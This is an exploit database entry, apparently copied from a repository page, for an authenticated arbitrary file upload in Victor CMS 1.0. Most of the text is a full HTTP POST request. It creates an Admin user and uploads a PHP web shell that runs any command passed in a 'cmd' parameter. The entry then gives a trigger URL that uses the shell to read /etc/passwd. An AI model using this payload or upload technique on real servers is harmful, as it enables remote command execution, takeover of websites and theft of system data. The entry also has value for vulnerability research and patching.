6bdc0c9fda
8 changes to exploits/shellcodes Pi-Hole - heisenbergCompensator Blocklist OS Command Execution (Metasploit) Victor CMS 1.0 - 'comment_author' Persistent Cross-Site Scripting Victor CMS 1.0 - 'cat_id' SQL Injection qdPM 9.1 - 'cfg[app_app_name]' Persistent Cross-Site Scripting php-fusion 9.03.50 - 'ctype' SQL Injection Submitty 20.04.01 - Persistent Cross-Site Scripting NukeViet VMS 4.4.00 - Cross-Site Request Forgery (Change Admin Password) Victor CMS 1.0 - Authenticated Arbitrary File Upload
67 lines
No EOL
2.3 KiB
Text
67 lines
No EOL
2.3 KiB
Text
# Exploit Title: Victor CMS 1.0 - Authenticated Arbitrary File Upload
|
|
# Google Dork: N/A
|
|
# Date: 2020-05-19
|
|
# Exploit Author: Kishan Lal Choudhary
|
|
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
|
|
# Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
|
|
# Version: 1.0
|
|
# Tested on: Windows 10
|
|
|
|
Description: The GET parameter '/admin/users.php?source=add_user' is vulnerable Arbitary File Uploads
|
|
|
|
|
|
POST /admin/users.php?source=add_user HTTP/1.1
|
|
Host: localhost
|
|
Content-Length: 1049
|
|
Cache-Control: max-age=0
|
|
Upgrade-Insecure-Requests: 1
|
|
Origin: http://localhost
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrMPNq33u6rCpEFhB
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
|
Referer: http://localhost/admin/users.php?source=add_user
|
|
Accept-Encoding: gzip, deflate
|
|
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8,fr;q=0.7
|
|
Cookie: PHPSESSID=cjpan858fghefnjse7qv1j3v72
|
|
Connection: close
|
|
|
|
------WebKitFormBoundaryrMPNq33u6rCpEFhB
|
|
Content-Disposition: form-data; name="user_name"
|
|
|
|
test
|
|
------WebKitFormBoundaryrMPNq33u6rCpEFhB
|
|
Content-Disposition: form-data; name="user_firstname"
|
|
|
|
test
|
|
------WebKitFormBoundaryrMPNq33u6rCpEFhB
|
|
Content-Disposition: form-data; name="user_lastname"
|
|
|
|
test
|
|
------WebKitFormBoundaryrMPNq33u6rCpEFhB
|
|
Content-Disposition: form-data; name="user_image"; filename="exp.php"
|
|
Content-Type: application/octet-stream
|
|
|
|
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
|
|
------WebKitFormBoundaryrMPNq33u6rCpEFhB
|
|
Content-Disposition: form-data; name="user_role"
|
|
|
|
Admin
|
|
------WebKitFormBoundaryrMPNq33u6rCpEFhB
|
|
Content-Disposition: form-data; name="user_email"
|
|
|
|
test@tets.com
|
|
------WebKitFormBoundaryrMPNq33u6rCpEFhB
|
|
Content-Disposition: form-data; name="user_password"
|
|
|
|
test@1234
|
|
------WebKitFormBoundaryrMPNq33u6rCpEFhB
|
|
Content-Disposition: form-data; name="create_user"
|
|
|
|
Add User
|
|
------WebKitFormBoundaryrMPNq33u6rCpEFhB--
|
|
|
|
|
|
|
|
The Shell can be triggered by visting
|
|
|
|
http://localhost/img/exp.php?cmd=cat%20/etc/passwd |